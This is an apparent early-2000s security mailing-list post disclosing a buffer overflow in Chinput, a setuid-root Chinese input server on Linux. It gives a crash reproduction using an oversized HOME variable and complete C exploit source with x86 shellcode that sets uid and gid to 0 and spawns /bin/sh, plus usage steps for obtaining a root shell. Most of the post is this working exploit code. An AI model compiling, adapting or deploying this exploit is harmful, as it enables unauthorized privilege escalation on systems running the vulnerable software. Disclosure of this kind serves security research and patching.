Chinput Buffer Overflow Vulnerability

[xperc <xperc () hotmail com>]

Hi, I'm xperc.

I found a vulnerability in Chinput which could
easily lead into a local root exploit. Chinput is
a Chinese input server on UNIX/Linux. It supports
XIM(X Input Method) Protocl and its own protocl
for Chinese platform.

$ls -l /usr/bin/chinput
-rwsr-xr-x  1  root  root  317272 Jan 15 21:31 
/usr/bin/chinput
$export HOME=`perl -e 'print "a"x800'`
$/usr/bin/chinput
Segmentation fault


/* local exploit for Chinput 3.0 
 * .. tested in TurboLinux 6.5 with kernel 2.2.18
 * 
 * Usage: $gcc chinput_exp.c
 *        $./a.out
 *        bash-2.04$ /usr/bin/chinput
 *         
 *                       by xperc () hotmail com
 *                               2002/1/16
 */
                   
#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90
#define OFS 0x1f0

unsigned long get_esp()
{
    __asm__("mov %esp,%eax");
}

char *shellcode=
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"    /*
setuid=0 */
    "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"    /*
setgid=0 */
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b"
    "\x33\xd2\x89\x56\x07\x89\x56\x0f"
    "\xb8\x1b\x56\x34\x12\x35\x10\x56"
    "\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7"
    "\xff\xff\xff/bin/sh";
        

char s[512];
char *s1;

int main()
{
        strcpy(s,"HOME=");
        s1=s+5;
        while(s1<s+260+5-strlen(shellcode)) 
            *(s1++)=NOP;

        while(*shellcode) 
            *(s1++)=*(shellcode++);
        *((unsigned long *)s1)=get_esp()-OFS;
        printf("Jump to: %p\n",*((long *)s1));
        s1+=4;
        *s1=0;
        putenv(s);
        system("bash");
}